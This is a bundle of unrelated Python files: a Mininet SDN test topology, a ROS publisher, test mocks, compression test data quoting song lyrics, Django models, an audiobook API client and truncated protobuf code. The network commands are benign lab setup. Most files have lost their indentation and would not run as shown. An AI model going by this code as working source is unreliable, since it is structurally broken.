#!/usr/bin/python
'''
TOPOLOGY USED IN NETSOFT 2015 TEST
Emulation of l3-scenario for the OpenStack case. Nodes:
- Host VM-User1: one interface
- Host VM-User2: one interface
- Host DPI: 2 interfaces
- Host WAN Accelerator (WANA): 2 interfaces (eth0 connected to s1 and eth1 connected to s2)
- Host TC: 2 interfaces (eth0 connected to s1 and eth1 connected to s2)
- Host GW: 2 interfaces
- Host VR: 2 interfaces
- Host h1: one interface
- Two Open vSwitch
1) sudo python test-l3-scenario.py
'''
from mininet.net import Mininet
from mininet.node import Node
from mininet.node import Host
from mininet.link import TCLink
from mininet.link import Intf
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from mininet.node import Controller
from mininet.node import RemoteController
from mininet.util import quietRun
from time import sleep
import os
import sys
def defineNetwork():
if len(sys.argv) < 2:
print "Missing paramenter: python test-l2-scenario.py <debug=1|0>"
sys.exit()
debug = sys.argv[1] #print some useful information
info("*** Create an empty network and add nodes and switch to it *** \n")
net = Mininet(controller=RemoteController, link=TCLink, build=False, xterms=True) #MyPOXController
info("\n*** Adding Controller: Controller will be external *** \n")
#Create the Open vSwitch bridges
info("\n*** Creating Switch *** \n")
s1 = net.addSwitch('s1')
s1.cmd( 'ovs-vsctl del-br ' + s1.name )
s1.cmd( 'ovs-vsctl add-br ' + s1.name )
s1.cmd( 'ovs-vsctl set Bridge '+ s1.name + ' stp_enable=false protocols=OpenFlow13' ) # Disabling STP
s2 = net.addSwitch('s2')
s2.cmd( 'ovs-vsctl del-br ' + s2.name )
s2.cmd( 'ovs-vsctl add-br ' + s2.name )
s2.cmd( 'ovs-vsctl set Bridge '+ s2.name + ' stp_enable=false protocols=OpenFlow13' ) # Disabling STP
#Create the hosts
info("\n*** Creating VM-User 1 *** \n")
vmu1 = net.addHost('VMU1')
info("\n*** Creating VM-User 2 *** \n")
vmu2 = net.addHost('VMU2')
info("\n*** Creating DPI *** \n")
dpi = net.addHost('DPI')
info("\n*** Creating WAN A. *** \n")
wana = net.addHost('WANA')
info("\n*** Creating TC *** \n")
tc = net.addHost('TC')
info("\n*** Creating GateWay *** \n")
gw = net.addHost('GW')
info("\n*** Creating Virtual Router *** \n")
vr = net.addHost('VR')
info("\n*** Creating External Host *** \n")
h1 = net.addHost('H1')
info("\n*** Creating Links *** \n")
#Create the links
net.addLink(vmu1, s1, bw=100)
net.addLink(vmu2, s1, bw=100)
net.addLink(dpi, s1, bw=100)
net.addLink(dpi, s2, bw=100)
net.addLink(wana, s1, bw=100)
net.addLink(wana, s2, bw=100)
net.addLink(tc, s1, bw=100)
net.addLink(tc, s2, bw=100)
net.addLink(gw, s1, bw=100)
net.addLink(gw, s2, bw=100)
net.addLink(vr, s2, bw=100)
net.addLink(vr, h1, bw=100)
#Trying to assign MAC address to each node of the topology
vmu1.setMAC("00:00:00:00:00:01", vmu1.name + "-eth0")
vmu2.setMAC("00:00:00:00:00:02", vmu2.name + "-eth0")
dpi.setMAC("00:00:00:00:00:03", dpi.name + "-eth0")
dpi.setMAC("00:00:00:00:00:04", dpi.name + "-eth1")
wana.setMAC("00:00:00:00:00:05", wana.name + "-eth0")
wana.setMAC("00:00:00:00:00:06", wana.name + "-eth1")
tc.setMAC("00:00:00:00:00:07", tc.name + "-eth0")
tc.setMAC("00:00:00:00:00:08", tc.name + "-eth1")
gw.setMAC("00:00:00:00:00:09", gw.name + "-eth0")
gw.setMAC("00:00:00:00:00:0A", gw.name + "-eth1")
vr.setMAC("00:00:00:00:00:0B", vr.name + "-eth0")
vr.setMAC("00:00:00:00:00:0C", vr.name + "-eth1")
h1.setMAC("00:00:00:00:00:0D", h1.name + "-eth0")
#Disabling IPv6
info('\n*** Disabling IPv6 ...\n')
vmu1.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
vmu1.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
vmu1.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
vmu2.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
vmu2.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
vmu2.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
dpi.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
dpi.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
dpi.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
wana.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
wana.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
wana.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
tc.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
tc.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
tc.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
gw.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
gw.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
gw.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
vr.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
vr.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
vr.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
h1.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
h1.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
h1.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
#Add interfaces to the switches
info('\n*** Adding interfaces to switches ***\n')
for intf in s1.intfs.values():
s1.cmd( 'ovs-vsctl add-port ' + s1.name + ' %s' % intf )
print "Eseguito comando: ovs-vsctl add-port s1 ", intf
for intf in s2.intfs.values():
s2.cmd( 'ovs-vsctl add-port ' + s2.name + ' %s' % intf )
print "Eseguito comando: ovs-vsctl add-port s2 ", intf
info("\n*** Starting Network using Open vSwitch and remote controller*** \n")
# Count hosts (used below for IP and gateway configuration)
nhosts = len(net.hosts)
print 'Total number of hosts: ' + str(nhosts)
count = 1
#net.build() #Allow to build xterm for each node
net.start()
#Configure Open vSwitch to use OpenFlow 1.3
s1.cmd( 'ovs-vsctl set bridge ' + s1.name + ' protocols=OpenFlow13') #OpenFlow 1.3
s2.cmd( 'ovs-vsctl set bridge ' + s2.name + ' protocols=OpenFlow13') #OpenFlow 1.3
# Set the controller for the switch
print "Switch name: ", s1.name, s2.name
s1.cmd('ovs-vsctl set-controller ' + s1.name + ' tcp:127.0.0.1:6633')
s2.cmd('ovs-vsctl set-controller ' + s2.name + ' tcp:127.0.0.1:6633')
info( '\n*** Waiting for switch to connect to controller' )
while 'is_connected' not in quietRun( 'ovs-vsctl show' ):
sleep( 1 )
info( '.' )
info('\n')
#IP Configuration
info('\n*** Going to take down default configuration ...\n')
info('\n*** ... and configuring interfaces \n')
for host in net.hosts:
print 'Deleting ip address on ' + host.name + '-eth0 interface ...'
host.cmd('ip addr del ' + host.IP(host.name + '-eth0') + '/8 dev ' + host.name + '-eth0')
print 'Deleting entry in IP routing table on ' + host.name
host.cmd('ip route del 10.0.0.0/8')
print "Going to configure new IP"
if host.name == 'VMU1' or host.name == 'VMU2' :
host.setIP("10.10.10." + str(count), 24, host.name + "-eth0")
print "[CURRENT-CHECK] IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
elif host.name == 'DPI' or host.name == 'WANA' or host.name == 'TC' or host.name == 'GW' :
host.setIP("10.10.10." + str(count), 24, host.name + "-eth0")
print "[CURRENT-CHECK] IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
host.setIP("10.20.20." + str(count-2), 24, host.name + "-eth1")
print "[CURRENT-CHECK] IP eth1: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth1')
host.cmd('sysctl -w net.ipv4.ip_forward=1')
print "IP Forwarding enabled!"
elif host.name == 'H1':
host.setIP("10.0.0." + str(count + 1), 30, host.name + '-eth0')
print "[CURRENT-CHECK] H1 IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
net.hosts[count - 2].setIP("10.0.0." + str(count + 2), 30, net.hosts[count - 2].name + "-eth1")
print net.hosts[count - 2].name + "-eth1 interface has been configured!"
print "[Checking VR IP] eth1: " + net.hosts[count - 2].IP('VR-eth1')
net.hosts[count - 2].cmd('sysctl -w net.ipv4.ip_forward=1')
print "On VR node: IP Forwarding enabled!"
else:
host.setIP("10.20.20." + str(count-2), 24, host.name + "-eth0")
print "[CURRENT-CHECK] IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
count = count + 1
print "\n"
#Gateway Configuration
print "Configuring gateway on each host.."
count=1
for host in net.hosts:
print "Adding gateway ..."
if host.name == 'VMU1' or host.name == 'VMU2' :
host.setDefaultRoute('dev ' + host.name + '-eth0 via ' + net.hosts[nhosts - 3].IP(net.hosts[nhosts - 3].name + '-eth0'))
elif host.name == 'VR' :
host.setDefaultRoute('dev ' + host.name + '-eth0 via ' + net.hosts[nhosts - 3].IP(net.hosts[nhosts - 3].name + '-eth1'))
elif host.name == 'GW' :
host.setDefaultRoute('dev ' + host.name + '-eth1 via ' + net.hosts[nhosts - 2].IP(net.hosts[nhosts - 2].name + '-eth0'))
elif host.name == 'H1' :
host.setDefaultRoute('dev ' + host.name + '-eth0 via ' + net.hosts[nhosts - 2].IP(net.hosts[nhosts - 2].name + '-eth1'))
elif host.name == 'DPI' or host.name == 'WANA' or host.name == 'TC' :
host.cmd('route add -net 10.0.0.8 netmask 255.255.255.252 gw 10.20.20.5')
#installing TrafficShaper on TC
info('\n*** Installing TrafficShaper on TC\n')
tc.cmd('tc qdisc del dev TC-eth1 root')
tc.cmd('tc qdisc add dev TC-eth1 root handle 1: cbq avpkt 1000 bandwidth 1000mbit')
tc.cmd('tc class add dev TC-eth1 parent 1: classid 1:1 cbq rate 10mbit allot 1500 prio 5 bounded')
tc.cmd('tc filter add dev TC-eth1 parent 1: protocol ip prio 16 u32 match ip dst 10.0.0.9 flowid 1:1')
tc.cmd('tc qdisc add dev TC-eth1 parent 1:1 sfq perturb 10')
#Debug mode
if debug:
print "******************** DEBUG MODE ON ********************"
print "[SWITCH] ", s1, " Number of interfaces is ", len(s1.intfs)
print "[SWITCH] ", s2, " Number of interfaces is ", len(s2.intfs)
print "List of hosts:"
for host in net.hosts:
info( host.name + '\n' )
print "[HOST " + host.name + " - Interfaces]"
print host.cmd('ip a')
print "[HOST " + host.name + " - Routing table]"
print host.cmd('route -n')
print "[HOST " + host.name + " - IPv6 status]"
print host.cmd('cat /proc/sys/net/ipv6/conf/all/disable_ipv6')
info('... running CLI \n***')
CLI(net)
info('\n')
info('... stopping Network ***\n')
net.stop()
#Main
if __name__ == '__main__':
setLogLevel('info')
defineNetwork()
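# Quick sanity checks once the Mininet CLI is up (run at the mininet> prompt;
# these assume the external controller on 127.0.0.1:6633 has already installed
# forwarding rules, otherwise the pings will fail):
#
#   mininet> VMU1 ping -c 3 VMU2
#   mininet> sh ovs-ofctl -O OpenFlow13 dump-flows s1
#   mininet> sh ovs-vsctl show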
|
#!/usr/bin/env python
import rospy
import requests
from std_msgs.msg import String
import random
from geometry_msgs.msg import Twist
import xavier_command
def talker():
initi = True
pub = rospy.Publisher('command', String, queue_size=10)
rospy.init_node('letterTalkerS', anonymous=True)
rate = rospy.Rate(1) # 1hz
while not rospy.is_shutdown():
something = raw_input()
pub.publish(something)
rate.sleep()
if __name__ == '__main__':
try:
talker()
car_publisher = rospy.Publisher('command', String, queue_size=10)
decoy = xavier_command.STOP
car_publisher.publish(decoy)
except rospy.ROSInterruptException:
car_publisher = rospy.Publisher('command', String, queue_size=10)
decoy = xavier_command.STOP
car_publisher.publish(decoy)
pass
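# Companion subscriber sketch (illustrative, not part of this node): a minimal
# listener for the same 'command' topic using the standard rospy API. The node
# name 'letterListener' is an assumption.
#
#   def callback(msg):
#       rospy.loginfo('received command: %s', msg.data)
#
#   def listener():
#       rospy.init_node('letterListener', anonymous=True)
#       rospy.Subscriber('command', String, callback)
#       rospy.spin()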
|
#!/usr/bin/env python3
# vim: fileencoding=utf-8 expandtab ts=4 nospell
# SPDX-FileCopyrightText: 2020-2021 Benedict Harcourt <ben.harcourt@harcourtprogramming.co.uk>
#
# SPDX-License-Identifier: BSD-2-Clause
"""
Test helpers used alongside the ORM system's Table tests: a mock object that
accepts arbitrary function calls, and unique marker objects for identity checks.
"""
from __future__ import annotations
from typing import Any, Callable, Dict, Optional, Tuple, Type, TypeVar
import unittest
Target = TypeVar("Target")
class CallableMock:
"""Mocking class that can accept any fuction call"""
testcase: unittest.TestCase
next_function: str
response: Any
args: Tuple[Any, ...]
kwargs: Dict[str, Any]
def __init__(self, test: unittest.TestCase) -> None:
self.testcase = test
self.next_function = ""
self.response = None
self.args = tuple()
self.kwargs = dict()
def expect(self, function: str, response: Any, *args: Any, **kwargs: Any) -> None:
"""Sets up what the next function call this Mock should expect next"""
self.next_function = function
self.response = response
self.args = args
self.kwargs = kwargs
def __getattr__(self, name: str) -> Optional[Callable[[Any], Any]]:
expected = self.next_function
self.testcase.assertEqual(
expected, name, f"Mock was not expecting a call to '{name}'"
)
return self.magic_call
def magic_call(self, *args: Any, **kwargs: Any) -> Any:
"""Fakes a call to the given function"""
self.testcase.assertEqual(self.args, args)
self.testcase.assertEqual(self.kwargs, kwargs)
return self.response
def cast(self, target: Type[Target]) -> Target:
"""'Casts' this object to a given type, to make type checkers ignore it."""
if not target:
raise ValueError("Missing type")
return self # type: ignore
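# Usage sketch (illustrative, not part of the original module): expect() arms
# the next call and its canned response, __getattr__ verifies the call name,
# and magic_call verifies the arguments before returning the response.
class CallableMockUsageExample(unittest.TestCase):
    """Minimal example of driving CallableMock from a test case."""

    def test_expected_call(self) -> None:
        mock = CallableMock(self)
        mock.expect("fetch", 42, "key", flag=True)
        self.assertEqual(mock.fetch("key", flag=True), 42)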
class MarkerObject:
"""Unique objects for testing with. Equal instantiated object will be unique"""
_counter: int = 0
marker: int
def __init__(self) -> None:
MarkerObject._counter += 1
self.marker = MarkerObject._counter
def __eq__(self, other: Any) -> bool:
"""Check if this is object is equal"""
if not isinstance(other, MarkerObject):
return False
return self.marker == other.marker
def cast(self, target: Type[Target]) -> Target:
"""'Casts' this object to a given type, to make type checkers ignore it."""
if not target:
raise ValueError("Missing type")
return self # type: ignore
|
TEXT = b"""
Overhead the albatross hangs motionless upon the air
And deep beneath the rolling waves in labyrinths of coral caves
The echo of a distant tide
Comes willowing across the sand
And everything is green and submarine
And no one showed us to the land
And no one knows the wheres or whys
But something stirs and something tries
And starts to climb towards the light
Strangers passing in the street
By chance two separate glances meet
And I am you and what I see is me
And do I take you by the hand
And lead you through the land
And help me understand the best I can
And no one calls us to move on
And no one forces down our eyes
No one speaks
And no one tries
No one flies around the sun
...
Echoes - Pink Floyd
"""
# Compression parameters:
# window_sz2 - 11
# lookahead_sz2 - 4
COMPRESSED = (
b'\x85S\xee\xd6[\x95\xa2\xcba\xb2H.\x96\x8b,\x82\xc3l\xb1Xn\x97+}\xce\xe7 '
b'\xb4Xm\xd6{\x9c\x82\xdbo\xbaZm\xf6\xebe\x94\x04\n\xebp\xb7\xdb\x80\x8dm7'
b'(U\x06\xddd\x90Y,\xb6[\x84\x82\xc5e\xb7Yl7K@\x0c%\xca\xdfl\xb6Zm\xd6y'
b'\x05\xde\xc3v\xb2\xdc\xe4\x16\x9bt\x82\xd9a\xb1^nV\x9bu\xd2\xd1s\x90['
b'\xec\xd2\x0b\x1d\xbe\xe5a\xb6H,`8p\xaa\xa0\x17\x15\x96\xc7h\xb7\x80\xb9'
b'\xd8d\x16KM\xce\xe9a\xb7]$\x17KM\x92\xcb\n\xa1\xdb\xed\xa0zW{M\xb2\xd9o'
b'\xbb\x82i\xd8la\x1e\x80\xc0w;\r\xba\xc8\x0fIe\x0b2\xbc\xdd-\x00<v\x9b'
b'\x9c\x82\xcfr\xb2\xd9m\xd2\x00\x1b)\x05\xce\xebb\xb6\xd8A\xc4\xac\xb0'
b'\xa0&Kp/\x95\xb8\r\x8a\xd1o\xbb\xd9l\x92\x0b\xa8"\x15\xbc\x11\xd2\xd8'
b'\x08\xee\x04\rk\xb7[\xee\xe0\xc2\xb7{E\x96\xe4\x0f\xa5o\xb9\x00I^np\xaa'
b'\x15\xd6\xe9 \xb9\x84y\x03R\xdc\xee\x96\x9b\x95\xcc\x19\xd4\x04\xe2\xe9r'
b'\xb4\x86q\x02Y\x86\x11\\\xae\x80\xc4\x96;e\xa6\xdbb\x00\x82\xbb\xd8nV@V'
b'[e\xa6\xcfh\xbaB\xa1U;\xa5\xc8UJ\xca\x08\x85p\xb0\xdc\xeeaz\x82\xa4\xb7;'
b'\xa0a\x15\xd2\x15B\xbc\xc8,b\xeeV;,\x82\xe9w\xb7\xc8.v[\x85\x86\xe5a'
b'\xbaYd\x16p\xaf+\x18J\x95\xb4\x08\xcc\x1a\x8e\x93 \xb0\xdbd\x17\x9b}\xd4"'
b'\xd2\xefh\xb0\xdd\x00D\xaev[(\x85\x9d\xb6\xca3ko\x01"\xbaXmvP&K\x15\xe4'
b'\x19P\x16\x88=\x96\xd8=\xc6\x03\x07t\xb4\\\xad\xf7[8\xde\xa8\x8aE\xa2'
b'\xcbl\xb8\x029H.\xb6\xeb U\x10\xcc\x11\r-\x8a\xcbs\x06s\xb1\xd8m\xc2uv;'
b'\r\xb2\xd8Cd\x1e\xe9m\xb7\xdd\xac\xa0(@=vk}\xc8.N\xc9o\xbb\xdb\xa4\x16'
b'\xfb\xad\xcaAe\xbc\x89iS\x86Y\xae\x16[\r\xacN\xd4\x0bXS\x14\x07\x9a\xcdl'
b'\x00\xc2\x90XB\x80\x82\x01\xaew[t*\x15.\x97K\xa1P\xaa)\x1c\x90\r\x94'
b'\xb6AP\xb4\xdb\xadr\n5\xb2\xdfy\xb2B\x80'
)
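# Round-trip sketch (an assumption, not part of the original file): this
# presumes the heatshrink2 Python bindings, which expose
# decompress(data, window_sz2=..., lookahead_sz2=...); any other heatshrink
# binding with equivalent parameters would be used the same way.
#
#   import heatshrink2
#   assert heatshrink2.decompress(COMPRESSED, window_sz2=11, lookahead_sz2=4) == TEXT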
|
from django.conf import settings
from django.db import models
from django.utils import timezone
class CardPlacementUserManager(models.Manager):
def all(self, user):
"""Returns all card placements belonging to the user
"""
return self.filter(user=user).all()
def get(self, user, *args, **kwargs):
"""Returns a card placement belonging to the user
"""
return self.filter(user=user).get(*args, **kwargs)
class CardPlacementCardManager(models.Manager):
def all(self, card):
"""Returns all card placements belonging to a card
"""
return self.filter(card=card).all()
def get(self, card, *args, **kwargs):
"""Returns a card placement belonging to a card
"""
return self.filter(card=card).get(*args, **kwargs)
class CardPlacementCardUserManager(models.Manager):
def get(self, card, user, *args, **kwargs):
"""Returns a card placement belonging to a card and the user
"""
return self.filter(card=card, user=user).get(*args, **kwargs)
class CardPlacement(models.Model):
AREA_CHOICES = (
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4'),
(5, '5'),
(6, '6'),
)
area = models.IntegerField(default=1, choices=AREA_CHOICES, verbose_name='Area')
card = models.ForeignKey('cards.Card', on_delete=models.CASCADE, related_name='card_placements')
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
last_interaction = models.DateTimeField(auto_now_add=True, blank=True, editable=False)
postpone_until = models.DateTimeField(default=timezone.now, blank=True)
objects = models.Manager()
user_objects = CardPlacementUserManager()
card_objects = CardPlacementCardManager()
card_user_objects = CardPlacementCardUserManager()
class Meta:
unique_together = (('card', 'user'),)
ordering = ['area']
indexes = [
models.Index(fields=['user']),
models.Index(fields=['card']),
]
def move_forward(self):
"""Increase the area
"""
if self.area < 6:
self.area += 1
self.save()
def move_backward(self):
"""Decrease the area
"""
if self.area > 1:
self.area -= 1
self.save()
def reset(self):
"""Set card to area 1
"""
self.area = 1
self.save()
def set_last_interaction(self, last_interaction=False):
"""Set date and time of last interaction
"""
if not last_interaction:
last_interaction = timezone.now()
self.last_interaction = last_interaction
self.save()
def postponed(self):
"""Return true if card has been postponed
"""
if self.postpone_until > timezone.now():
return True
else:
return False
def expedite(self):
"""Reset postpone marker
"""
self.postpone_until = timezone.now()
self.save()
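# Usage sketch (hypothetical view code, not part of this module), showing how
# the per-user and per-card managers are intended to be queried:
#
#   placements = CardPlacement.user_objects.all(user=request.user)
#   placement = CardPlacement.card_user_objects.get(card=card, user=request.user)
#   if not placement.postponed():
#       placement.move_forward()
#       placement.set_last_interaction()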
|
import audiolibrix
import hmac
import requests
from hashlib import sha256
class Auth:
def __init__(self):
if (
not isinstance(audiolibrix.api_credentials, tuple)
or len(audiolibrix.api_credentials) != 2
):
raise audiolibrix.error.APIError(
"Invalid credentials to Audiolibrix service provided (expected "
"two-part tuple with `client_id` and `shared_secret`)."
)
def sign(self, message):
return (
hmac.new(
audiolibrix.api_credentials[1].encode("utf-8"),
message.encode("utf-8"),
sha256,
)
.hexdigest()
.upper()
)
class Requestor:
def request(
self,
url,
data=None,
params=None,
method="GET",
signature_base="",
timeout=None,
):
# Use fresh dicts instead of mutable default arguments; both are used as
# dicts below when a signature is attached.
if data is None:
data = {}
if params is None:
params = {}
headers = {
"x-merchantapi-merchant": audiolibrix.api_credentials[0],
"User-Agent": "audiolibrix-python/" + audiolibrix.VERSION,
"Accept": "application/json",
}
if method.upper() == "POST":
headers["Content-Type"] = "application/json"
if signature_base != "":
data["Signature"] = Auth().sign(signature_base)
elif method.upper() == "GET":
if signature_base != "":
params["signature"] = Auth().sign(signature_base)
try:
response = requests.request(
method=method,
url=audiolibrix.API_ENDPOINT + url,
headers=headers,
json=data,
params=params,
timeout=timeout
if timeout
else audiolibrix.default_request_timeout,
)
except Exception as e:
self._handle_request_error(e)
try:
data = response.json()
except ValueError:
raise audiolibrix.error.APIError(
"Improperly structured JSON that cannot be read: %s "
"(HTTP status code %s)"
% (response.text, response.status_code),
response.text,
)
try:
items = data["data"]
except (KeyError, TypeError):
try:
error = data["error"]
except (KeyError):
raise audiolibrix.error.APIError(
"Invalid error response object from API: %s"
% response.text,
response.text,
)
if error["id"] == "InvalidSignature":
raise audiolibrix.error.InvalidRequestError(
"Incorrect signature", response.text
)
elif error["id"] == "UnknownMerchant":
raise audiolibrix.error.InvalidAuthorizationError(
"Authorization information incorrect or missing",
response.text,
)
elif error["id"] == "NotFound":
raise audiolibrix.error.NotFoundError(
"Requested item not found or does not exist", response.text
)
elif error["id"] == "NoItems":
raise audiolibrix.error.InvalidRequestError(
"No items to be bought", response.text
)
elif error["id"] == "InvalidEmail":
raise audiolibrix.error.InvalidRequestError(
"Buyer's e-mail address invalid or missing", response.text
)
elif error["id"] == "InvalidOrderId":
raise audiolibrix.error.InvalidRequestError(
"Merchant's e-mail address invalid or missing",
response.text,
)
elif error["id"] == "ItemsNotFound":
raise audiolibrix.error.InvalidRequestError(
"Following items are not found: %s"
% ", ".join([str(item) for item in error["items"]]),
response.text,
)
elif error["id"] == "ItemsNotForSale":
raise audiolibrix.error.InvalidRequestError(
"Following items are not for sale: %s"
% ", ".join([str(item) for item in error["items"]]),
response.text,
)
elif error["id"] == "OrderMismatch":
raise audiolibrix.error.InvalidRequestError(
"Order with the same merchant identifier already exists, but "
"contains different items: %s"
% ", ".join([str(item) for item in error["items"]]),
response.text,
)
elif error["id"] == "OrderNotFound":
raise audiolibrix.error.NotFoundError(
"Order not found or does not exist", response.text
)
else:
raise audiolibrix.error.APIError(
"Unknown error occurred, try again later", response.text
)
return items
def _handle_request_error(self, e):
if isinstance(e, requests.exceptions.RequestException):
err = "%s: %s" % (type(e).__name__, str(e))
else:
err = "A %s was raised" % (type(e).__name__,)
if str(e):
err += " with error message %s" % (str(e),)
else:
err += " with no error message"
msg = "Network error: %s" % (err,)
raise audiolibrix.error.APIConnectionError(msg)
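# Usage sketch (illustrative; the endpoint path is an assumption, and
# audiolibrix.api_credentials / audiolibrix.API_ENDPOINT are assumed to be
# configured elsewhere in the package):
#
#   audiolibrix.api_credentials = ("my-client-id", "my-shared-secret")
#   items = Requestor().request("catalogue", params={}, method="GET")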
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dc.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='dc.proto',
package='',
syntax='proto3',
serialized_pb=_b('\n\x08\x64\x63.proto\"\\\n\x07Request\x12\r\n\x05genes\x18\x02 \x03(\t\x12\x10\n\x08ontology\x18\x01 \x01(\t\x12\x0e\n\x06growth\x18\x03 \x01(\x08\x12\x0e\n\x06npaths\x18\x04 \x01(\x05\x12\x10\n\x08request1\x18\x05 \x01(\x01\"3\n\x05Reply\x12\x14\n\x05nodes\x18\x03 \x03(\x0b\x32\x05.Node\x12\x14\n\x05\x65\x64ges\x18\x04 \x03(\x0b\x32\x05.Edge\"\xa5\x01\n\x04Node\x12\n\n\x02id\x18\x01 \x01(\t\x12\n\n\x02gi\x18\x02 \x01(\x01\x12\r\n\x05state\x18\x03 \x01(\x01\x12\x0f\n\x07neurons\x18\x04 \x03(\x01\x12\x1f\n\ncoordinate\x18\x05 \x01(\x0b\x32\x0b.Coordinate\x12\x0e\n\x06growth\x18\x06 \x01(\x01\x12\x10\n\x08\x66\x65\x61ture1\x18\x07 \x01(\t\x12\x10\n\x08\x66\x65\x61ture2\x18\x08 \x01(\x01\x12\x10\n\x08\x66\x65\x61ture3\x18\t \x01(\x01\"\"\n\nCoordinate\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\"~\n\x04\x45\x64ge\x12\x0e\n\x06source\x18\x01 \x01(\t\x12\x0e\n\x06target\x18\x02 \x01(\t\x12\x12\n\nimportance\x18\x03 \x01(\x05\x12\x0c\n\x04type\x18\x04 \x01(\x05\x12\x10\n\x08\x66\x65\x61ture1\x18\x05 \x01(\t\x12\x10\n\x08\x66\x65\x61ture2\x18\x06 \x01(\x01\x12\x10\n\x08\x66\x65\x61ture3\x18\x07 \x01(\x01\x32%\n\x08\x44\x65\x65pCell\x12\x19\n\x03Run\x12\x08.Request\x1a\x06.Reply\"\x00\x62\x06proto3')
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='genes', full_name='Request.genes', index=0,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ontology', full_name='Request.ontology', index=1,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='growth', full_name='Request.growth', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='npaths', full_name='Request.npaths', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='request1', full_name='Request.request1', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12,
serialized_end=104,
)
_REPLY = _descriptor.Descriptor(
name='Reply',
full_name='Reply',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='nodes', full_name='Reply.nodes', index=0,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='edges', full_name='Reply.edges', index=1,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=106,
serialized_end=157,
)
_NODE = _descriptor.Descriptor(
name='Node',
full_name='Node',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='Node.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gi', full_name='Node.gi', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='state', full_name='Node.state', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
